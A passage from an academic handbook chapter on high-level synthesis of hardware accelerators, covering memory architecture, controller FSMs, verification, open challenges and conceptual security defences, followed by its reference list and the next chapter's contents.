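A hedged sketch of the per-node check performed along the chain (base addresses and sizes are hypothetical; the HLS engine assigns the real values at design time):

    // Each memory node answers only if the address falls in its
    // statically assigned range; otherwise the request is forwarded.
    enum { A0_BASE = 0x1000, A0_SIZE = 0x0400 };

    int node_serves(unsigned addr) {
        if (addr >= A0_BASE && addr < A0_BASE + A0_SIZE)
            return 1;   // this local bank activates and serves the request
        return 0;       // request propagates to the next node; the last
                        // node is the external memory interface
    }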
Fig. 9 Daisy-chain memory architecture to support the dynamic resolution of memory addresses
in Bambu (Pilato et al. 2011b; Pilato and Ferrandi 2013)
coming from HLS. When performing operations on the PE array, the data are
moved from the main memory to the on-chip memories, and the array is configured
to execute the given dataflow. Ping-pong buffers are used to overlap computation
and communication. The same optimizations described above (multi-port memories
and distribution of the accesses to avoid conflicts) can be applied to optimize the
architecture. Designers must explore similar trade-offs between more banks for
higher throughput and fewer banks for better wiring and physical constraints.
After defining the complete microarchitecture of the accelerator, the HLS engine
must define the control part, i.e., the component that determines the control signals
for the datapath in each clock cycle. This part is modeled as a deterministic finite-
state machine (FSM). An FSM is a directed graph where each node represents
a control state and the edges are the transitions from one state to another. Each
control state contains the set of operations to be executed in the corresponding clock
cycle, along with the control signals for the datapath resources (e.g., multiplexer
selectors and register write-enable signals). For each operation to execute on a given
functional unit, the FSM determines the paths for providing the input values to the
functional unit and the results to the next resource (either another functional unit
in chaining or a target register). Based on the scheduling and the evaluation of the
conditions in the datapath, the control state determines which transition to activate,
i.e., which is the next control state to execute.
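A compact C-style sketch of the controller structure (signal names are illustrative; the actual output is an HDL description):

    typedef enum { S_LOAD, S_EXEC, S_DONE } state_t;

    // One step of the controller: each state drives the datapath control
    // signals and selects the next state, possibly using a condition
    // evaluated in the datapath.
    state_t fsm_step(state_t state, int cond,
                     int *mux_sel, int *reg_we, int *done) {
        switch (state) {
        case S_LOAD: *mux_sel = 0; *reg_we = 1; return S_EXEC;
        case S_EXEC: *mux_sel = 1; *reg_we = 1;
                     return cond ? S_EXEC : S_DONE;  // loop back or exit
        default:     *done = 1;  return S_DONE;
        }
    }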
The controller FSM manages not only the execution inside the accelerator
but also the system-level synchronization with external components. This aspect
is relevant especially for control-dominated applications (where the accelerator’s
execution can vary based on external signals) and streaming architectures (where
data availability can change the accelerator dynamics). In these cases, the controller
must receive additional control signals from the rest of the system to determine
which specific transitions must be activated inside the FSM.
After the HLS engine defines the microarchitecture of the accelerator (both datapath
and controller), the last phase produces the HDL descriptions for the subsequent
logic synthesis and the auxiliary files for system-level integration.
FPGA synthesis tools may infer memory components in different ways. Similarly,
targeting ASIC technologies requires instantiating the vendor-specific descriptions
of the proper static RAMs. For example, Mnemosyne provides an abstraction of these
low-level details: the designer is only required to provide a wrapper around the
specific SRAMs to match the standardized signal descriptions.
In this phase, many tools (e.g., Xilinx Vivado HLS and Bambu) provide early
estimates of the hardware cost of the design. While complete synthesis can
provide more accurate results, this process is time-consuming and not feasible when
the designer needs to explore many alternatives before finding the most favorable
implementation. These estimations are based on different methods, including
cumulative costs of single resources, linear regressions, and graph neural networks
to include feedback from actual synthesis steps (Makrani et al. 2019).
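For example, the cumulative-cost method reduces to a weighted sum of the allocated resources, as in the following sketch (the coefficients are invented; real tools calibrate them against the target technology):

    // Toy LUT estimate for an FPGA target; each coefficient would come
    // from characterizing the corresponding unit on the chosen device.
    double estimate_luts(int adders, int multipliers, int mux_inputs) {
        return 32.0 * adders + 600.0 * multipliers + 4.0 * mux_inputs;
    }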
Once the design has been finalized, the designers also need to verify that the
hardware execution produces the expected results. Indeed, errors can be caused by
incorrect language specifications, misuse of synthesis directives, wrong connection
of the components, or bugs in the HLS tools. While formal verification is a well-
established step in logic and physical synthesis, this approach requires reference and
current designs to be described in hardware languages. However, in case of HLS, the
input code is usually a software-level, untimed specification. Therefore, simulation-
based approaches remain the preferred solution for HLS verification (Chen et al.
2017). Heterogeneous architectures exacerbate these verification issues for the
application programmers, especially when the computation is distributed across
software and hardware tasks, and the accelerators are generated with different
methods (e.g., preexisting IPs, manually designed components, and HLS modules
created with different toolchains). Hardware/software debugging allows designers
to trace a bug back to its exact point of failure. Since the complexity
of architectures is increasing, bugs could be exercised after a long execution
time. Therefore, in case of system-level verification, simulation-based approaches
have been progressively replaced by on-chip debugging. Many FPGA vendors, for
example, provide automated methods to trace internal signals, exposing them to
the user to identify execution anomalies. Advanced methods automatically identify
discrepancies between hardware execution and the expected behavior (precomputed
in software), restricting the area where the error originated (Fezzardi et al. 2015).
These approaches are particularly efficient in FPGA, thanks to the reconfiguration
of the logic. The designer can implement a design with on-chip monitors, execute it
directly on the target system to verify the behavior, and modify the functionality in
case of problems. For this reason, FPGA prototyping is largely used also in ASIC
design flows to emulate the functionality of the entire chip and test the interaction
with the software, including the operating system (OS) (Mantovani et al. 2016b).
This section discusses open challenges that still need to be addressed in HLS,
along with modern challenges in hardware design that can be efficiently tackled
with the support of HLS.
However, this process is complex, as it requires details that are currently lost
during compilation. Software programmers usually put little to no thought into
memory management, because hardware mechanisms (e.g., complex cache hierarchies
and bypassing) hide the memory latency. In the case of accelerators,
the specialization of the memory architectures adds effort to the development time,
both at the software and hardware levels (Dally et al. 2020). At the software
level, algorithms need to be reworked to reap the full benefits of a custom
memory architecture. Domain-specific languages, like Spatial, incorporate hardware
abstractions to ease the description of common memory operations and speed up
the development of these accelerators. For example, operations on arrays, tensors,
and matrices are common in scientific and machine-learning applications. Such
operations must be translated into efficient operations regardless of the allocation
of the data and the location/implementation of the memories. At the hardware level,
deciding how to partition a software data structure requires many considerations.
On one hand, larger memories are slower, use more power, and use more resources.
On the other hand, the external routing and address calculation logic for a collection
of many smaller memories have the same issues. A middle ground between one
large memory and many small memories exists which minimizes these issues, but
finding the right compromise can be difficult. Automated high-level synthesis can
be useful to perform rapid design space exploration to find a desired trade-off
point. Specialized modules for pre-fetching the data from external memories can
hide the communication latency but require global information on the use of the
data. In case of systolic array architectures, the designers have to carefully define
the local memories and the buffers between them and the processing elements to
also coordinate the data transfers with the off-chip memory. However, this process
requires more information than is available in current HLS flows.
Emerging technologies will play a key role in the design of efficient, secure,
and reliable accelerators. First, integrated voltage regulators will enable fine-grained
power management with dynamic voltage-frequency scaling, while dual-rail mem-
ories will help reduce the static power consumption. In addition, some applications,
like graph analytics, require frequent but irregular memory accesses to off-chip
memory, whose I/O circuitry and refresh activities are responsible for up to 30%
of the system energy consumption (power wall). The specialization of memory
architectures, in this case, must include emerging memory technologies. However,
many novel technologies, like Hybrid Memory Cube and High Bandwidth Memory
technologies, are 3D solutions that can store only few gigabytes of data, while
DDR4 can store up to hundreds of gigabytes (capacity wall). Architectures that
combine DRAM with nonvolatile memory technologies (NVM), which require no
refresh, can store up to terabytes of data but require a careful co-design that involves
the entire stack (Hameed et al. 2018).
Finally, all specializations require modifications to the HLS input languages
to embed more domain-specific information. Domain-specific languages (DSLs)
will be used by application engineers to specify the algorithmic core of the
computation. They will be increasingly used to provide rich information to the
compiler and lower-level tools about the high-level semantics of the algorithms.
While DSLs can help describe functional requirements (like the operations among
data structures), additional annotations allow designers to express nonfunctional
requirements or constraints. For example, Bambu already supports the specification
of custom data allocation via XML files to specialize the creation of the accelerator’s
memory architecture and the simplification of the logic to compute the addresses.
However, a co-design of the accelerators with the algorithm description would
allow the automatic configuration of these steps (see Section “Programmability
and System-Level Optimization”). DSLs, however, are often hard for software
programmers to adopt, and they may create integration issues. An interesting
approach is to use DSL only for specific application kernels embedded in traditional
languages, e.g., with template meta-programming in C++, or for high-level specifi-
cations of specific workloads (e.g., machine-learning algorithms) (see Chap. 28,
“FPGA-Specific Compilers” for more details).
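A hedged sketch of the C++ template route (hypothetical code, not a specific tool's interface): compile-time parameters make sizes and types visible to the HLS compiler for specialization.

    // Kernel "DSL" embedded in C++ templates: T and N are fixed at
    // instantiation, so the HLS tool sees constant trip counts and
    // data widths.
    template <typename T, int N>
    void vec_mac(const T a[N], const T b[N], T &acc) {
        for (int i = 0; i < N; i++)
            acc += a[i] * b[i];   // fully unrollable: N is a constant
    }
    // e.g., vec_mac<short, 16>(a, b, acc) specializes one configuration.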
Hardware/software integration has open challenges for data allocation in the case
of large data sets. Current solutions allow users to allocate data at the software
side and transparently access them from the accelerators; these solutions are
processor-centric. Data are allocated in the memory hierarchy of the processors
(see, e.g., the Intel HARP prototype system), or the accelerator requires efficient
methods not only to manage the data locally but also to hide the latency to
access them. The design of domain-specific accelerators requires the approach
to be changed and the components to be co-designed with the domain-specific
memory architecture and the corresponding allocation policy. To do so, designers
need a unified representation of the software code and the HLS specification to
apply holistic transformations at both sides. Modern compiler representations, like
MLIR (Lattner et al. 2021), are gaining traction but require specific customization
within HLS frameworks. These representations will enable and ease the integration
of memory-specific transformations in the front-end phase. For example,
loop transformations will be coordinated with transformations in the data structures
to improve the data accesses based on the technology of the memories and the
location of the data. Rich information about the data access patterns of the algorithm
allows the compiler to extract more parallelism and embed more intelligence in the
memory controllers.
Finally, design space exploration will become more and more important to
offer alternative solutions to the designers. Indeed, a fully automated approach is
almost impossible to achieve, partly because the effects of compiler optimizations
and transformations are often application-dependent. Therefore, HLS tools have a
limited view of, and control over, the synthesis process, and there is no well-established flow or
sequence of passes. Designers must apply transformations, analyze and understand
the results, and derive knowledge for further optimization. This process is the same
as in software compilers for code optimization, where machine-learning approaches
have been proposed for compiler autotuning (Ashouri et al. 2018).
FPGA-based systems are typically used in applications and algorithms, like machine
learning, that are rapidly changing. The flexibility of FPGA systems is also used
by cloud service providers to reuse the resources across multiple users (tenants).
However, this opens up the possibility that malicious providers can copy the design’s
intellectual property or users can steal sensitive data of other applications (Pilato
et al. 2018a). While protection methods exist for specific cases, their manual
application becomes unfeasible for large systems due to their cost or for nonexpert
designers due to their complexity. Also, the heterogeneity of the system can
introduce new vulnerabilities due to the interaction of components that are not
designed at the same time. For example, accelerators have fixed functionality;
therefore, it is not possible to perform code injection. However, a malicious
attacker can launch software-based attacks by providing configuration parameters
or system configurations that exploit known vulnerabilities in single components or
their interactions.
Physical attacks can exploit the weaknesses of a given hardware implementation
for stealing private data (information leakage). For example, side-channel attacks
can extract secret data by analyzing nonfunctional effects (like power consumption
and timing characteristics) of the device execution. Accelerators can mitigate side-
channel attacks by scrambling the execution to make a uniform power consumption
or ensuring constant execution time to thwart timing attacks (Jiang et al. 2018). The
modular HLS flow can accommodate additional passes to automatically integrate
these extensions and co-optimize them with the accelerator logic.
Another critical issue is IP theft: designing heterogeneous systems is a complex
and expensive process. The outcome should be protected from reverse engineering
and unauthorized copying, which can create billions of dollars of economic damage
for the semiconductor design houses. While designers are more sensitive to this
problem for ASIC, it is finding an increasing interest also in the FPGA and HLS
community. First, designers must guarantee that outsourcing the execution of their
designs to third-party cloud providers does not leak details about their algorithms
or implementations. Then, embedded FPGAs are also used in several integrated
circuits to host specific functions that must remain hidden, with HLS identifying
and implementing such functions to fit the given logic (Chen et al. 2020). Such security features,
like watermarking and obfuscation, can be introduced on top of the HLS
results (Pilato et al. 2018b,c). For example, TAO applies semantic obfuscation
during HLS so that the resulting accelerator is able to thwart reverse engineering.
Conclusion
High-level synthesis is a key enabling technology for the creation of modern heterogeneous systems. Nonexpert
designers can use HLS to create specialized accelerators directly from high-level
specifications, focusing only on the algorithmic development. HLS then creates
and optimizes the hardware components based on the user’s requirements hiding
most of the effort from the designers. This chapter provided an overview on the
HLS process, describing the existing approaches for the different HLS phases: the
analysis of the input specification, the creation of the accelerator microarchitecture,
and the generation of the output files. It also discussed open challenges, like
the creation of domain-specific architectures and the programmability issues, and
modern challenges, like security concerns, that can be addressed with the support of
HLS.
References
Ashouri AH, Killian W, Cavazos J, Palermo G, Silvano C (2018) A survey on compiler autotuning
using machine learning. ACM Comput Surv 51(5):1–42
Bazargan K, Kastner R, Ogrenci S, Sarrafzadeh M (2000) A C to hardware/software compiler.
In: Proceedings of the IEEE symposium on field-programmable custom computing machines
(FCCM), pp 331–332
Bombieri N, Liu H-Y, Fummi F, Carloni LP (2013) A method to abstract RTL IP blocks into
C++ code and enable high-level synthesis. In: Proceedings of the ACM/EDAC/IEEE design
automation conference (DAC), pp 1–9
Brewer F, Gajski DD (1990) Chippe: a system for constraint driven behavioral synthesis. IEEE
Trans Comput-Aided Des Integr Circuits Syst 9(7):681–695
Brisk P, Kaplan A, Sarrafzadeh M (2004) Area-efficient instruction set synthesis for reconfig-
urable system-on-chip designs. In: Proceedings of the ACM/EDAC/IEEE design automation
conference (DAC), pp 395–400
Brisk P, Dabiri F, Jafari R, Sarrafzadeh M (2006) Optimal register sharing for high-level synthesis
of SSA form programs. IEEE Trans Comput-Aided Des Integr Circuits Syst 25(5):772–779
Buyukkurt B, Cortes J, Villarreal J, Najjar WA (2011) Impact of high-level transformations within
the ROCCC framework. ACM Trans Archit Code Optim (TACO) 7(4):17
Canis A, Choi J, Aldham M, Zhang V, Kammoona A, Czajkowski T, Brown SD, Anderson JH
(2013) LegUp: an open-source high-level synthesis tool for FPGA-based processor/accelerator
systems. ACM Trans Embed Comput Syst (TECS) 13(2):24:1–24:27
Canis A, Brown SD, Anderson JH (2014) Modulo SDC scheduling with recurrence minimization
in high-level synthesis. In: Proceedings of the IEEE international conference on field
programmable logic and applications (FPL), pp 1–8
Carloni LP (2015) From latency-insensitive design to communication-based system-level design.
Proc IEEE 103(11):2133–2151
Chang E-S, Gajski DD, Narayan S (1996) An optimal clock period selection method based on
slack minimization criteria. ACM Trans Des Autom Electron Syst (TODAES) 1(3):352–370
Chatarasi P, Neuendorffer S, Bayliss S, Vissers K, Sarkar V (2020) Vyasa: a high-performance
vectorizing compiler for tensor convolutions on the Xilinx AI engine
Chen D, Cong J (2004) Register binding and port assignment for multiplexer optimization. In:
Proceeding of the Asia and South Pacific design automation conference (ASPDAC), pp 68–73
Chen W, Ray S, Bhadra J, Abadir M, Wang L (2017) Challenges and trends in modern SoC design
verification. IEEE Des Test 34(5):7–22
Chen J, Zaman M, Makris Y, Blanton RDS, Mitra S, Schafer BC (2020) DECOY: DEflection-
Driven HLS-Based Computation Partitioning for Obfuscating Intellectual Property. In:
Proceedings of the ACM/IEEE design automation conference (DAC), pp 1–6
Choi J, Brown SD, Anderson JH (2017) From pthreads to multicore hardware systems in LegUp
high-level synthesis for FPGAs. IEEE Trans Very Large Scale Integr (VLSI) Syst 25(10):
2867–2880
Cilardo A, Flich J, Gagliardi M, Gavila RT (2015) Customizable heterogeneous acceleration for
tomorrow’s high-performance computing. In: Proceedings of the IEEE international conference
on high performance computing and communications (HPCC), pp 1181–1185
Cong J (2015) High-level synthesis and beyond – from datacenters to IoTs. In: Proceedings of the
IEEE international system-on-chip conference (SOCC), pp 1–1
Cong J, Zhang Z (2006) An efficient and versatile scheduling algorithm based on SDC formulation.
In: Proceedings of the ACM/EDAC/IEEE design automation conference (DAC), pp 433–438
Cong J, Fan Y, Han G, Jiang W, Zhang Z (2006) Platform-based behavior-level and system-level
synthesis. In: Proceedings of the IEEE international SOC conference, pp 199–202
Cong J, Liu B, Neuendorffer S, Noguera J, Vissers K, Zhang Z (2011) High-level synthesis for
FPGAs: from prototyping to deployment. IEEE Trans Comput-Aided Des Integr Circuits Syst
30(4):473–491
Cong J, Huang M, Pan P, Wang Y, Zhang P (2016) Source-to-source optimization for
HLS, pp 137–163
Cota EG, Mantovani P, Guglielmo GD, Carloni LP (2015) An analysis of accelerator coupling
in heterogeneous architectures. In: Proceedings of the ACM/EDAC/IEEE design automation
conference (DAC)
Coussy P, Chavet C, Bomel P, Heller D, Senn E, Martin E (2008) GAUT: a high-level synthesis
tool for DSP applications, pp 147–169
Dai S, Liu G, Zhang Z (2018) A scalable approach to exact resource-constrained scheduling
based on a joint SDC and SAT formulation. In: Proceedings of the ACM/SIGDA international
symposium on field programmable gate arrays (FPGA), pp 137–146
Dally WJ, Turakhia Y, Han S (2020) Domain-specific hardware accelerators. Commun ACM 63
(7):48–57. ISSN 0001-0782
De Micheli G (1993) High-level synthesis of digital circuits. In: Advances in computers, vol 37.
Elsevier, The Netherlands, pp 207–283
de Fine Licht J, Besta M, Meierhans S, Hoefler T (2021) Transformations of high-level synthesis
codes for high-performance computing. IEEE Trans Parallel Distrib Syst 32(05):1014–1029
Edwards SA (2006) The challenges of synthesizing hardware from C-like languages. IEEE Des
Test 23(5):375–386
Edwards SA, Townsend R, Barker M, Kim MA (2019) Compositional dataflow circuits. ACM
Trans Embed Comput Syst (TECS) 18(1):1–27
Ernst D, Kim NS, Das S, Pant S, Rao R, Pham T, Ziesler C, Blaauw D, Austin T, Flautner K, Mudge
T (2003) Razor: a low-power pipeline based on circuit-level timing speculation. In: Proceedings
of the annual IEEE/ACM international symposium on microarchitecture (MICRO), pp 7–18
Esmaeilzadeh H, Blem E, St. Amant R, Sankaralingam K, Burger D (2012) Dark silicon and the
end of multicore scaling. IEEE Micro 32(3):122–134
Fezzardi P, Castellana M, Ferrandi F (2015) Trace-based automated logical debugging for high-
level synthesis generated circuits. In: Proceedings of the IEEE international conference on
computer design (ICCD), pp 251–258
Gajski DD (1984) Silicon compilers and expert systems for VLSI. In: Proceedings of the
ACM/EDAC/IEEE design automation conference (DAC), pp 86–87
Galuzzi C, Panainte EM, Yankova Y, Bertels K, Vassiliadis S (2006) Automatic selection
of application-specific instruction-set extensions. In: Proceedings of the IEEE/ACM/IFIP
international conference on hardware/software codesign and system synthesis (CODES+ISSS),
pp 160–165
Genc H, Haj-Ali A, Iyer V, Amid A, Mao H, Wright J, Schmidt C, Zhao J, Ou A, Banister M, Shao
YS, Nikolic B, Stoica I, Asanovic K (2019) Gemmini: an agile systolic array generator enabling
systematic evaluations of deep-learning architectures. arXiv preprint arXiv:1911.09925
Giri D, Chiu KL, Di Guglielmo G, Mantovani P, Carloni LP (2020) ESP4ML: platform-
based design of systems-on-chip for embedded machine learning. In: Proceedings of the
ACM/EDAC/IEEE design, automation & test conference in Europe (DATE), pp 1049–1054
Guglielmo GD, Pilato C, Carloni LP (2014) A design methodology for compositional high-level
synthesis of communication-centric SoCs. In: Proceedings of the ACM/EDAC/IEEE design
automation conference (DAC), pp 1–6
Gupta S, Dutt N, Gupta R, Nicolau A (2003) Spark: a high-level synthesis framework for applying
parallelizing compiler transformations. In: Proceedings of the international conference on VLSI
design, pp 461–466
Hadjis S, Canis A, Sobue R, Hara-Azumi Y, Tomiyama H, Anderson JH (2015) Profiling-driven
multi-cycling in FPGA high-level synthesis. In: Proceedings of the ACM/EDAC/IEEE design,
automation & test conference in Europe (DATE), pp 31–36
Hameed F, Khan AA, Castrillon J (2018) Performance and energy-efficient design of STT-RAM
last-level cache. IEEE Trans Very Large Scale Integr (VLSI) Syst 26(6):1059–1072
Horowitz M (2014) 1.1 computing’s energy problem (and what we can do about it). In: Proceedings
of the IEEE international solid-state circuits conference digest of technical papers (ISSCC),
pp 10–14
Hsiao H, Anderson JH (2019) Thread weaving: static resource scheduling for multithreaded high-
level synthesis. In: Proceedings of the ACM/EDAC/IEEE design automation conference (DAC)
Huang Q, Lian R, Canis A, Choi J, Xi R, Calagar N, Brown SD, Anderson JH (2015) The effect
of compiler optimizations on high-level synthesis-generated hardware. ACM Trans Reconfig
Technol Syst (TRETS) 8(3):14:1–14:26
Jiang Z, Dai S, Suh GE, Zhang Z (2018) High-level synthesis with timing-sensitive information
flow enforcement. In: Proceedings of the IEEE/ACM international conference on computer-
aided design (ICCAD), pp 1–8
Josipovic L, Brisk P, Ienne P (2017a) From C to elastic circuits. In: Proceedings of the Asilomar
conference on signals, systems, and computers (ACSSC), pp 121–125
Josipovic L, Brisk P, Ienne P (2017b) An out-of-order load-store queue for spatial computing.
In: Proceedings of the IEEE symposium on field-programmable custom computing machines
(FCCM), pp 134–134
Josipović L, Ghosal R, Ienne P (2018) Dynamically scheduled high-level synthesis. In:
Proceedings of the ACM/SIGDA international symposium on field programmable gate arrays
(FPGA), pp 127–136
Klimovic A, Anderson JH (2013) Bitwidth-optimized hardware accelerators with software fall-
back. In: Proceedings of the IEEE international conference on field-programmable technology
(FPT), pp 136–143
Koeplinger D, Feldman M, Prabhakar R, Zhang Y, Hadjis S, Fiszel R, Zhao T, Nardi L, Pedram A,
Kozyrakis C, Olukotun K (2018) Spatial: a language and compiler for application accelerators.
In: Proceedings of the ACM SIGPLAN conference on programming language design and
implementation (PLDI), pp 296–311. ISBN 9781450356985
Kotsifakou M, Srivastava P, Sinclair MD, Komuravelli R, Adve V, Adve S (2018) HPVM:
heterogeneous parallel virtual machine. In: Proceedings of the ACM SIGPLAN symposium
on principles and practice of parallel programming (PPoPP), pp 68–80
Ku DC, Micheli GD (1991) Constrained resource sharing and conflict resolution in Hebe.
Integration 12(2):131–165
Lattner C, Amini M, Bondhugula U, Cohen A, Davis A, Pienaar J, Riddle R, Shpeisman T,
Vasilache N, Zinenko O (2020) MLIR: a compiler infrastructure for the end of Moore’s law
Lattner C, Amini M, Bondhugula U, Cohen A, Davis A, Pienaar J, Riddle R, Shpeisman T,
Vasilache N, Zinenko O (2021) MLIR: scaling compiler infrastructure for domain specific
computation. In: Proceedings of the IEEE/ACM international symposium on code generation
and optimization (CGO), pp 2–14
Lattuada M, Ferrandi F (2015) Code transformations based on speculative SDC scheduling. In:
Proceedings of the IEEE/ACM international conference on computer-aided design (ICCAD),
pp 71–77
Lattuada M, Ferrandi F (2019) A design flow engine for the support of customized dynamic high
level synthesis flows. ACM Trans Reconfig Technol Syst (TRETS) 12(4):1–26
Liu J, Cong J (2019) Dataflow systolic array implementations of matrix decomposition using
high level synthesis. In: Proceedings of the ACM/SIGDA international symposium on field
programmable gate arrays (FPGA), p 187
Makrani HM, Sayadi H, Mohsenin T, Rafatirad S, Sasan A, Homayoun H (2019) XPPE:
cross-platform performance estimation of hardware accelerators using machine learning. In:
Proceedings of the 24th Asia and South Pacific design automation conference (ASPDAC)
Mantovani P, Cota EG, Pilato C, Guglielmo GD, Carloni LP (2016a) Handling large data sets for
high-performance embedded applications in heterogeneous systems-on-chip. In: Proceedings
of the international conference on compilers, architectures, and synthesis of embedded systems
(CASES), pp 3:1–3:10
Mantovani P, Cota EG, Tien K, Pilato C, Guglielmo GD, Shepard K, Carloni LP (2016b) An
FPGA-based infrastructure for fine-grained DVFS analysis in high-performance embedded
systems. In: Proceedings of the ACM/EDAC/IEEE design automation conference (DAC)
Mantovani P, Giri D, Di Guglielmo G, Piccolboni L, Zuckerman J, Cota EG, Petracca M, Pilato C,
Carloni LP (2020) Agile SoC development with open ESP. In: Proceedings of the IEEE/ACM
international conference on computer-aided design (ICCAD), pp 1–6
Martin G, Smith G (2009) High-level synthesis: past, present, and future. IEEE Des Test Comput
26(4):18–25
Minutoli M, Castellana VG, Tumeo A, Ferrandi F (2015) Inter-procedural resource sharing in high
level synthesis through function proxies. In: Proceedings of the IEEE international conference
on field programmable logic and applications (FPL), pp 1–8
Minutoli M, Castellana VG, Tumeo A, Lattuada M, Ferrandi F (2016) Efficient synthesis of graph
methods: a dynamically scheduled architecture. In: Proceedings of the IEEE/ACM international
conference on computer-aided design (ICCAD)
Nane R, Sima VM, Pilato C, Choi J, Fort B, Canis A, Chen YT, Hsiao H, Brown S, Ferrandi F,
Anderson J, Bertels K (2016) A survey and evaluation of FPGA high-level synthesis tools.
IEEE Trans Comput-Aided Des Integr Circuits Syst 35(10):1591–1604
Ndu G (2012) Boosting single thread performance in mobile processors using reconfigurable
acceleration. PhD thesis
Pilato C (2017) Bridging the gap between software and hardware designers using high-level
synthesis. In: Proceedings of the international conference on parallel computing (PARCO),
pp 622–631
Pilato C, Ferrandi F (2013) Bambu: a modular framework for the high level synthesis of
memory-intensive applications. In: Proceedings of the IEEE international conference on field
programmable logic and applications (FPL), pp 1–4
Pilato C, Tumeo A, Palermo G, Ferrandi F, Lanzi PL, Sciuto D (2008) Improving evolutionary
exploration to area-time optimization of FPGA designs. J Syst Archit Embed Syst Des 54(11):
1046–1057
Pilato C, Castellana VG, Lovergine S, Ferrandi F (2011a) A runtime adaptive controller for
supporting hardware components with variable latency. In: Proceedings of the NASA/ESA
conference on adaptive hardware and systems (AHS), pp 153–160
Pilato C, Ferrandi F, Sciuto D (2011b) A design methodology to implement memory accesses
in high-level synthesis. In: Proceedings of the IEEE/ACM/IFIP international conference on
hardware/software codesign and system synthesis (CODES+ISSS), pp 49–58
Pilato C, Mantovani P, Guglielmo GD, Carloni LP (2017) System-level optimization of accelerator
local memory for heterogeneous systems-on-chip. IEEE Trans Comput-Aided Des Integr
Circuits Syst 36(3):435–448
Pilato C, Garg S, Wu K, Karri R, Regazzoni F (2018a) Securing hardware accelerators: a new
challenge for high-level synthesis. IEEE Embed Syst Lett 10(3):77–80
Pilato C, Basu K, Shayan M, Regazzoni F, Karri R (2018b) High-level synthesis of benevolent
trojans. In: Proceedings of the ACM/EDAC/IEEE design, automation & test conference in
Europe (DATE), pp 1124–1129
Pilato C, Regazzoni F, Karri R, Garg S (2018c) TAO: techniques for algorithm-level obfuscation
during high-level synthesis. In: Proceedings of the ACM/EDAC/IEEE design automation
conference (DAC), pp 1–6
Pilato C, Wu K, Garg S, Karri R, Regazzoni F (2019) TaintHLS: high-level synthesis for dynamic
information flow tracking. IEEE Trans Comput-Aided Des Integr Circuits Syst 38(5):798–808
Pilato C, Bohm S, Brocheton F, Castrillon J, Cevasco R, Cima V, Cmar R, Diamantopoulos D,
Ferrandi F, Martinovic J, Palermo G, Paolino M, Parodi A, Pittaluga L, Raho D, Regazzoni F,
Slaninova K, Hagleitner C (2021) EVEREST: a design environment for extreme-scale big data
analytics on heterogeneous platforms. In: Proceedings of the design, automation, and test in
Europe conference and exhibition (DATE)
Pothineni N, Brisk P, Ienne P, Kumar A, Paul K (2010) A high-level synthesis flow for custom
instruction set extensions for application-specific processors. In: Proceedings of the IEEE Asian
and South Pacific design automation conference (ASP-DAC), pp 707–712
Pu J, Bell S, Yang X, Setter J, Richardson S, Ragan-Kelley J, Horowitz M (2017) Programming
heterogeneous systems from an image processing DSL. ACM Trans Archit Code Optim 14
(3):1–25
Ragan-Kelley J, Barnes C, Adams A, Paris S, Durand F, Amarasinghe S (2013) Halide: a language
and compiler for optimizing parallelism, locality, and recomputation in image processing
pipelines. In: Proceedings of the ACM SIGPLAN conference on programming language design
and implementation (PLDI), pp 519–530. ISBN 9781450320146
Ranjan Panda P, Dutt ND, Nicolau A (1998) Incorporating DRAM access modes into high-level
synthesis. IEEE Trans Comput-Aided Des Integr Circuits Syst 17(2):96–109
Stok L (1994) Data path synthesis. Integration 18(1):1–71
Venkatesan R, Shao YS, Wang M, Clemons J, Dai S, Fojtik M, Keller B, Klinefelter A, Pinckney
N, Raina P, Zhang Y, Zimmer B, Dally WJ, Emer J, Keckler SW, Khailany B (2019) Magnet:
a modular accelerator generator for neural networks. In: Proceedings of the IEEE/ACM
international conference on computer-aided design (ICCAD), pp 1–8
Weerasinghe J, Polig R, Abel F, Hagleitner C (2016) Network-attached FPGAs for data center
applications. In: Proceedings of the international conference on field-programmable technology
(FPT), pp 36–43
Windh S, Ma X, Halstead RJ, Budhkar P, Luna Z, Hussaini O, Najjar WA (2015) High-level
language tools for reconfigurable computing. Proc IEEE 103(3):390–408
Zhu J, Gajski DD (1999) A unified formal model of ISA and FSMD. In: Proceedings of the seventh
international workshop on hardware/software codesign (CODES), pp 121–125
25 Processor Simulation and Characterization
Grant Edmund Martin, Suhas Madhusudana, Greg Efland,
and Vadim Kustov
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 876
Application and Algorithm Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 879
Data Types and Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 879
Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 880
Example: Affine Transform of 2D Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 881
New or Existing Processor? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 882
Existing Processor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 882
Extending Configurable Processor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 883
New Processor with New ISA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 883
Hybrid Mode: New ISA with Custom Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 884
Standard Benchmarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 884
Issues with Estimating Processor Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 884
Whetstone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 888
Linpack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 888
Dhrystone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 888
CoreMark . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 889
Embench . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 890
